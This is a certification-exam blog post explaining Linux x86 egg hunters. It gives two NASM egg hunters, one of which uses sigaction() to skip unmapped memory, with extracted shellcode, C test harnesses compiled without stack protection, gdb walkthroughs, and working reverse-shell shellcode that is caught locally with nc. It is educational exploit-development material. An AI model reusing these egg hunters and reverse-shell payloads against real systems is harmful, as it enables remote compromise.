Egg Hunters on Linux

In this blog post I will discuss egg hunters: what they are, why they are useful and how to use them.

Before diving into the realm of egg hunters, it is convenient to quickly recap the basics of the VAS (Virtual Address Space) model on the Linux platform.

VAS – Virtual Address Space

Every running process gets its own 4 GB virtual address space (on 32-bit Linux), which consists of the following memory segments (blue):

[Figure: memory segments of a Linux process virtual address space]

Virtual addresses are translated to physical memory through page tables (1) maintained by the kernel.

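Kernel-space mappings are static and identical in every process. For example, the kernel code that services system calls sits at the same virtual addresses in all processes, although user-mode code cannot access it directly and enters it only through the system call interface (int 0x80).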

The other memory segments belong to user-mode space and contain per-process dynamic mappings, whose locations are randomized every time a new process is started: Linux randomizes the location of the stack, the heap and the memory mapping segment. This mechanism is known as ASLR (Address Space Layout Randomization).

If a process tries to access an unmapped memory region (white), it is terminated with a segmentation fault (SIGSEGV).

These are the most important VAS facts you need to grasp egg hunters comfortably. For a friendly discussion of VAS, check Gustavo Duarte’s post.

What are egg hunters and why use them?

Imagine that you have shellcode which needs to be encrypted or obfuscated. Such shellcode grows in size quickly. Moreover, the executable memory space you control in the process’ VAS is so tight that it cannot hold even 50 bytes worth of opcodes. At least you find out that you are able to indirectly write a larger memory block somewhere else in the VAS.

Now you need a kind of memory-crawling shellcode which fits into 50 bytes and searches the user-mode region of the VAS for your larger payload. This shellcode is called an egg hunter. The egg is a unique sequence of bytes located at a fixed offset from the payload (usually placed just before it).

Generally, we can divide egg hunters by robustness into:

  • egg hunters without unmapped memory check
  • egg hunters with unmapped memory check

Egg hunters which don’t check for unmapped addresses can crawl only mapped addresses. This implies that there must be no unmapped address between the crawler’s starting address and the egg location; otherwise the process is terminated by a segmentation fault. These egg hunters can be as small as 11 bytes.

Egg hunters which check for unmapped addresses can crawl over such addresses without receiving a segmentation fault. These egg hunters bypass ASLR because they crawl the entire user-mode space. However, this ability inflates their size to 30-50 bytes.

Example: Egg hunter without unmapped memory check

Assembly code for the egg hunter

; File: egghunter_no_memcheck.nasm


global _start

section .text

_start:

    ; suppose we know our payload is located somewhere on the stack
    ; above ESP, so let the crawler start from ESP
    mov eax, esp

    ; define egg
    ; note that egg must contain valid opcodes because
    ; it will get executed before payload
    mov edx, 0x464e464e     ; bytes 4e 46 4e 46 in memory: dec esi, inc esi, dec esi, inc esi

search_first_egg:

    inc eax                 ; step to next byte
    cmp dword [eax], edx    ; compare the 4 bytes at [eax] with the egg in edx
    jne search_first_egg    ; repeat loop if not match

search_second_egg:

    ; CAUTION
    ; The egg also appears in the .data section of the test binary
    ; built around this egg hunter shellcode (the egg hunter's own
    ; mov edx immediate contains it). If the crawl can pass through
    ; .data, account for that: prepend the egg to the payload twice
    ; and let the egg hunter look for two consecutive eggs.

    cmp dword [eax+4], edx
    jne search_first_egg

egg_found:

    ; load eip with eax, execute egg, execute payload
    jmp eax

Compile the .nasm file into an object file (2):

$ nasm -f elf32 -o egghunter_no_memcheck.o egghunter_no_memcheck.nasm

Link the object file into an executable binary:

$ ld -o egghunter_no_memcheck egghunter_no_memcheck.o

Check for null bytes (3):

$ objdump -M intel -d egghunter_no_memcheck | grep 00

Extract the shellcode from the binary:

$ objdump -d ./egghunter_no_memcheck|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Insert it into a C test wrapper:

// File: shellcode_no_memcheck.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// matches the egg in the egg hunter assembly: mov edx, 0x464e464e
#define EGG "\x4e\x46\x4e\x46"

// this line inserts 1x EGG string into the binary's .data section
unsigned char egg[] = EGG;

// the egg hunter is also stored in .data, and its mov edx immediate
// contains 1x more EGG string
unsigned char egghunter[] = \
"\x89\xe0\xba\x4e\x46\x4e\x46\x40\x39\x10\x75\xfb\x39\x50\x04\x75\xf6\xff\xe0";

unsigned char shellcode[] = \
"\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x5b\x68\x7f\x01\x01\x01\x66\x68\x13\xba\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x87\xde\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x41\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xf7\xe1\xb0\x0b\xcd\x80";

int main(void)
{
    printf("Egghunter Length:  %zu\n", sizeof(egghunter) - 1);

    char stack[200];
    printf("Memory location of shellcode: %p\n", (void *)stack);

    // these 2 lines insert 2x EGG strings into the [stack] region
    strcpy(stack, (char *)egg);
    strcpy(stack + 4, (char *)egg);
    // the payload directly follows the second egg
    strcpy(stack + 8, (char *)shellcode);

    int (*CodeFun)() = (int(*)())egghunter;
    CodeFun();

    return 0;
}

As the payload I use the reverse shell connecting to localhost:5050, which I developed in a previous post.

Compile the C test code without stack-smashing protection (-fno-stack-protector) and with an executable stack (-z execstack, an option gcc passes on to the linker):

$ gcc -fno-stack-protector -z execstack shellcode_no_memcheck.c -o shellcode_no_memcheck

Let’s inspect what is happening inside the program with gdb. Set a breakpoint on the egghunter array and run the program:

(gdb) break *&egghunter
(gdb) disas
=> 0x0804a045 <+0>: mov eax,esp
0x0804a047 <+2>: mov edx,0x464e464e
0x0804a04c <+7>: inc eax
0x0804a04d <+8>: cmp DWORD PTR [eax],edx
0x0804a04f <+10>: jne 0x804a04c
0x0804a051 <+12>: cmp DWORD PTR [eax+0x4],edx
0x0804a054 <+15>: jne 0x804a04c
0x0804a056 <+17>: jmp eax
0x0804a058 <+19>: add BYTE PTR [eax],al
(gdb) x/110bx $esp
0xbffff224: 0x60 0xa0 0x04 0x08 0xd0 0xfa 0xff 0xb7
0xbffff22c: 0x44 0xf3 0xff 0xbf 0x00 0xf3 0xff 0xbf
0xbffff234: 0x4e 0x46 0x4e 0x46 0x4e 0x46 0x4e 0x46
0xbffff23c: 0x6a 0x66 0x58 0x6a 0x01 0x5b 0x31 0xc9
0xbffff244: 0x51 0x53 0x6a 0x02 0x89 0xe1 0xcd 0x80
0xbffff24c: 0x89 0xc6 0xb0 0x66 0x5b 0x68 0x7f 0x01
0xbffff254: 0x01 0x01 0x66 0x68 0x13 0xba 0x66 0x53
0xbffff25c: 0x89 0xe1 0x6a 0x10 0x51 0x56 0x89 0xe1
0xbffff264: 0x43 0xcd 0x80 0x87 0xde 0x6a 0x02 0x59
0xbffff26c: 0xb0 0x3f 0xcd 0x80 0x49 0x79 0xf9 0x41
0xbffff274: 0x51 0x68 0x6e 0x2f 0x73 0x68 0x68 0x2f
0xbffff27c: 0x2f 0x62 0x69 0x89 0xe3 0xf7 0xe1 0xb0
0xbffff284: 0x0b 0xcd 0x80 0x00 0x00 0x00

The egg hunter crawls the stack byte by byte until it finds the double egg at 0xbffff234. EIP is then loaded with the address of the first egg and execution continues from there: the egg bytes run as harmless dec esi / inc esi pairs, followed by the payload. Note that disas cannot show the payload in this case. The egghunter array is a named symbol, so gdb knows its bounds, but the stack buffer is not, so gdb cannot tell which function contains the program counter. If you try to disassemble while stepping through the payload, you get

(gdb) disas
No function contains program counter for selected frame

but the instructions still execute correctly. To see them anyway, the gdb command

(gdb) x/50i $eip

interprets the bytes in memory as instructions.

If you continue execution, you get a reverse shell on localhost:5050:

$ nc -nvl 127.1.1.1 5050
Connection from 127.0.0.1 port 5050 [tcp/*] accepted
whoami
maple

Example: Egg hunter with unmapped memory check

In this example I use the sigaction() system call to check whether a memory address is valid. A few more techniques are described in this paper.

Scenario

Let egg+egg+shellcode be somewhere in the heap of the process. This time we don’t know where to start crawling: there is nothing like an “EHP” (Extended Heap Pointer) register, so the egg hunter has no way to reference a starting point for the crawl. We need to crawl the entire process’ VAS, and the egg hunter must travel a long way to reach the heap segment: unmapped low memory > .text > .data > .bss > unmapped memory > and finally the heap. Every address must be checked before it is accessed; otherwise we get a segmentation fault in unmapped memory.

sigaction() system call

The sigaction() system call is normally used to change the action taken by a process on receipt of a specific signal. However, its behaviour can be leveraged to check whether memory is valid without triggering a SIGSEGV signal.

The signature of sigaction() is:

int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);

What is of paramount interest to us is that if the act argument points to memory which is not a valid part of the process address space, sigaction() fails with EFAULT; the raw system call returns -EFAULT (-14) in EAX. The structure that syscall 67 reads through act on i386 is 16 bytes long (four 4-byte fields: handler, mask, flags and restorer), so if sigaction() does not return EFAULT for a checked address, we have 16 consecutive bytes of valid memory starting at that address.

Assembly code

From /usr/include/i386-linux-gnu/asm/unistd_32.h we get the system call number:

#define __NR_sigaction           67

From /usr/include/asm-generic/errno-base.h we get the EFAULT error number:

#define EFAULT          14      /* Bad address */

Assembly code for the egg hunter

; File: egghunter_memcheck.nasm

global _start

section .text

_start:

next_page:
    ; set the low 12 bits of ecx, making it the last address of its page
    or cx, 0xfff

next_address:

    inc ecx                 ; next byte, or start of the next page after or cx, 0xfff
    
    ; sigaction() syscall 67 = 0x43
    push byte +0x43
    pop eax
    
    ; execute sigaction()
    ; eax=0x43, ebx=not_set (signum), ecx=address to check (act), edx=not_set (oldact)
    int 0x80
    
    ; check for EFAULT
    ; Code for EFAULT is -14=0xfffffff2
    ; Checking just for last byte
    cmp al, 0xf2
    
    ; If EFAULT jump to next page in memory
    jz next_page
    
    ; If valid memory
    ; set eax=egg, edi=address to be checked
    ; scasd compares eax with the dword at [edi],
    ; then advances edi by 4 (DF=0) whether or not they match
    mov eax, 0x464e464e
    mov edi, ecx
    
    scasd
    jnz next_address    ; jump if eax != dword [ecx]
    
    ; check for second egg occurrence
    scasd
    jnz next_address    ; jump if eax != dword [ecx+4]
    
    ; egg found twice, edi was increased 2x4 bytes by scasd
    ; so it now points directly to shellcode
    jmp edi

The scasd instruction stands for “scan string dword”: it compares EAX with the dword at [EDI] and then advances EDI by 4. Note that unmapped memory is skipped one page (4) at a time, whereas mapped memory is crawled byte by byte.

Compiling and testing the assembly code

Compile the .nasm file into an object file (2):

$ nasm -f elf32 -o egghunter_memcheck.o egghunter_memcheck.nasm

Link the object file into an executable binary:

$ ld -o egghunter_memcheck egghunter_memcheck.o

Check for null bytes (3):

$ objdump -M intel -d egghunter_memcheck | grep 00

Extract the shellcode from the binary:

$ objdump -d ./egghunter_memcheck|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Insert it into a C test wrapper:

// File: shellcode_memcheck.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// matches the egg in the egg hunter assembly: mov eax, 0x464e464e
#define EGG "\x4e\x46\x4e\x46"

// this line inserts 1x EGG string into the binary's .data section
char egg[] = EGG;

// the egg hunter is also stored in .data, and its mov eax immediate
// contains 1x more EGG string
unsigned char egghunter[] = \
"\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x4e\x46\x4e\x46\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";

unsigned char shellcode[] = \
"\x6a\x66\x58\x6a\x01\x5b\x31\xc9\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x5b\x68\x7f\x01\x01\x01\x66\x68\x22\xb8\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x87\xde\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x41\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xf7\xe1\xb0\x0b\xcd\x80";

int main(void)
{
    printf("Egghunter Length:  %zu\n", sizeof(egghunter) - 1);

    char *heapMemory = malloc(300);
    if (heapMemory == NULL)
        return 1;

    // these 2 lines insert 2x EGG strings into the [heap] region
    memcpy(heapMemory + 0, egg, 4);
    memcpy(heapMemory + 4, egg, 4);
    // copy the payload including its terminating null byte
    // (sizeof already counts it, so no + 1)
    memcpy(heapMemory + 8, shellcode, sizeof(shellcode));

    printf("Memory location of shellcode: %p\n", (void *)heapMemory);

    int (*CodeFun)() = (int(*)())egghunter;
    CodeFun();

    free(heapMemory);
    return 0;
}

In this case egg+egg+shellcode is located in the heap segment.

Compile the C test code without stack-smashing protection (-fno-stack-protector) and with an executable stack (-z execstack, an option gcc passes on to the linker):

$ gcc -fno-stack-protector -z execstack shellcode_memcheck.c -o shellcode_memcheck

Executing the program, we get a reverse shell on port 8888:

$ nc -nvl 8888
Connection from 127.0.0.1 port 8888 [tcp/*] accepted
whoami
maple

Analysis with GDB

Let’s quickly inspect the innards of the egg hunter with gdb.

Fire up gdb, set a breakpoint on egghunter and run the program:

(gdb) break *&egghunter
(gdb) run
(gdb) disas
=> 0x0804a048 <+0>: or cx,0xfff
0x0804a04d <+5>: inc ecx
0x0804a04e <+6>: push 0x43
0x0804a050 <+8>: pop eax
0x0804a051 <+9>: int 0x80
0x0804a053 <+11>: cmp al,0xf2
0x0804a055 <+13>: je 0x804a048
0x0804a057 <+15>: mov eax,0x464e464e
0x0804a05c <+20>: mov edi,ecx
0x0804a05e <+22>: scas eax,DWORD PTR es:[edi]
0x0804a05f <+23>: jne 0x804a04d
0x0804a061 <+25>: scas eax,DWORD PTR es:[edi]
0x0804a062 <+26>: jne 0x804a04d
0x0804a064 <+28>: jmp edi
0x0804a066 <+30>: add BYTE PTR [eax],al

Inspect the virtual memory mappings of the process:

(gdb) info proc mappings
process 22460
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x8048000 0x8049000 0x1000 0x0 /mnt/hgfs/share/SLAE_exam/problem3/shellcode_memcheck
0x8049000 0x804a000 0x1000 0x0 /mnt/hgfs/share/SLAE_exam/problem3/shellcode_memcheck
0x804a000 0x804b000 0x1000 0x1000 /mnt/hgfs/share/SLAE_exam/problem3/shellcode_memcheck
0x8768000 0x8789000 0x21000 0x0 [heap]
0xb7553000 0xb7554000 0x1000 0x0
0xb7554000 0xb76f8000 0x1a4000 0x0 /lib/i386-linux-gnu/libc-2.15.so
0xb76f8000 0xb76f9000 0x1000 0x1a4000 /lib/i386-linux-gnu/libc-2.15.so
0xb76f9000 0xb76fb000 0x2000 0x1a4000 /lib/i386-linux-gnu/libc-2.15.so
0xb76fb000 0xb76fc000 0x1000 0x1a6000 /lib/i386-linux-gnu/libc-2.15.so
0xb76fc000 0xb76ff000 0x3000 0x0
0xb770e000 0xb7711000 0x3000 0x0
0xb7711000 0xb7712000 0x1000 0x0 [vdso]
0xb7712000 0xb7732000 0x20000 0x0 /lib/i386-linux-gnu/ld-2.15.so
0xb7732000 0xb7733000 0x1000 0x1f000 /lib/i386-linux-gnu/ld-2.15.so
0xb7733000 0xb7734000 0x1000 0x20000 /lib/i386-linux-gnu/ld-2.15.so
0xbfc36000 0xbfc57000 0x21000 0x0 [stack]

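In the first egg hunter iteration ECX is 0x1000 (4096), which is not mapped in the process’ virtual address space. Therefore EAX receives 0xfffffff2 (-14, i.e. -EFAULT) and execution jumps to the next memory page (4). Note that the egg hunter never initializes ECX: reaching 0x1000 after or cx, 0xfff and inc ecx means ECX was below 0x1000 on entry in this run.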

(gdb) disas
0x0804a051 <+9>: int 0x80
=> 0x0804a053 <+11>: cmp al,0xf2
0x0804a055 <+13>: je 0x804a048 <egghunter>
(gdb) p/x $eax
$3 = 0xfffffff2

The next address checked is 0x2000 (8192), and so on, page by page, until the egg hunter finds a valid address. The first valid process address is 0x8048000, the start of the .text segment:

0x8048000  0x8049000     0x1000        0x0 /mnt/hgfs/share/SLAE_exam/problem3/shellcode_memcheck

As we know, the .data section should contain two single eggs, coming from these lines of the compiled C file:

// first single occurrence
char egg[] = EGG;
// second single occurrence
unsigned char egghunter[] = \
"\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x4e\x46\x4e\x46\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7";

Searching valid memory byte by byte discovers the egg in the .data section at 0x804a040 and 0x804a058.

(gdb) disas
0x0804a05f <+23>: jne 0x804a04d
=> 0x0804a061 <+25>: scas eax,DWORD PTR es:[edi]
0x0804a062 <+26>: jne 0x804a04d
(gdb) x/wx $ecx
0x804a040 : 0x464e464e
(gdb) c
(gdb) x/wx $ecx
0x804a058 : 0x464e464e
(gdb) maintenance info sections
0x804a020->0x804a0cc at 0x00001020: .data ALLOC LOAD DATA HAS_CONTENTS

However, the second scasd comparison does not pass, so byte-by-byte scanning continues until sigaction() hits an invalid memory region at 0x804aff1. This address still belongs to

0x804a000  0x804b000     0x1000     0x1000 /mnt/hgfs/share/SLAE_exam/problem3/shellcode_memcheck

but sigaction() reads the 16-byte structure at [0x804aff1, 0x804aff1 + 16) = [0x804aff1, 0x804b001), and its last byte, 0x804b000, lies outside valid memory.

If we let the program continue until

(gdb) disas
0x0804a062 <+26>: jne 0x804a04d
=> 0x0804a064 <+28>: jmp edi
0x0804a066 <+30>: add BYTE PTR [eax],al

we see that the egg hunter found two consecutive occurrences of the egg starting at 0x8768008

(gdb) x/2wx $ecx
0x8768008: 0x464e464e 0x464e464e

located near the lower bound of the heap:

0x8768000  0x8789000    0x21000        0x0 [heap]

The second occurrence of the egg is directly followed by the shellcode:

(gdb) x/90bx $ecx
0x8768008: 0x4e 0x46 0x4e 0x46 0x4e 0x46 0x4e 0x46
0x8768010: 0x6a 0x66 0x58 0x6a 0x01 0x5b 0x31 0xc9
0x8768018: 0x51 0x53 0x6a 0x02 0x89 0xe1 0xcd 0x80
0x8768020: 0x89 0xc6 0xb0 0x66 0x5b 0x68 0x7f 0x01
0x8768028: 0x01 0x01 0x66 0x68 0x22 0xb8 0x66 0x53
0x8768030: 0x89 0xe1 0x6a 0x10 0x51 0x56 0x89 0xe1
0x8768038: 0x43 0xcd 0x80 0x87 0xde 0x6a 0x02 0x59
0x8768040: 0xb0 0x3f 0xcd 0x80 0x49 0x79 0xf9 0x41
0x8768048: 0x51 0x68 0x6e 0x2f 0x73 0x68 0x68 0x2f
0x8768050: 0x2f 0x62 0x69 0x89 0xe3 0xf7 0xe1 0xb0
0x8768058: 0x0b 0xcd 0x80 0x00 0x00 0x00 0x00 0x00
0x8768060: 0x00 0x00

EDI points to the beginning of the shellcode because the two successful scasd instructions incremented it by 2×4 bytes:

(gdb) p/x $edi
$9 = 0x8768010

The final jmp edi loads EDI into EIP; enjoy your reverse shell on localhost:8888:

=> 0x0804a064 <+28>:    jmp    edi
(gdb) c

$ nc -nvl 8888
Connection from 127.0.0.1 port 8888 [tcp/*] accepted
whoami
maple

(1) A page table is the data structure used by a virtual memory system in a computer operating system to store the mapping between virtual addresses and physical addresses. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by the hardware, or more specifically, by the RAM subsystem.

(2) An object file contains machine code: the binary representation of low-level instructions that the CPU understands, which is why objdump can disassemble it. An object file is not directly executable; it must first be linked (here with ld).

(3) Shellcode must be free of null bytes because many C string functions (e.g. strcpy) treat a null byte as the string terminator. Shellcode containing null bytes gets truncated when copied through such functions, which leads to unpredictable behaviour and hard-to-find bugs.

(4) A page, memory page, or virtual page is a fixed-length contiguous block of virtual memory, described by a single entry in the page table. It is the smallest unit of data for memory management in a virtual memory operating system.


This blog post has been created to fulfil the requirements of the SecurityTube Linux Assembly Expert certification

Github code

Student ID: SLAE-1443
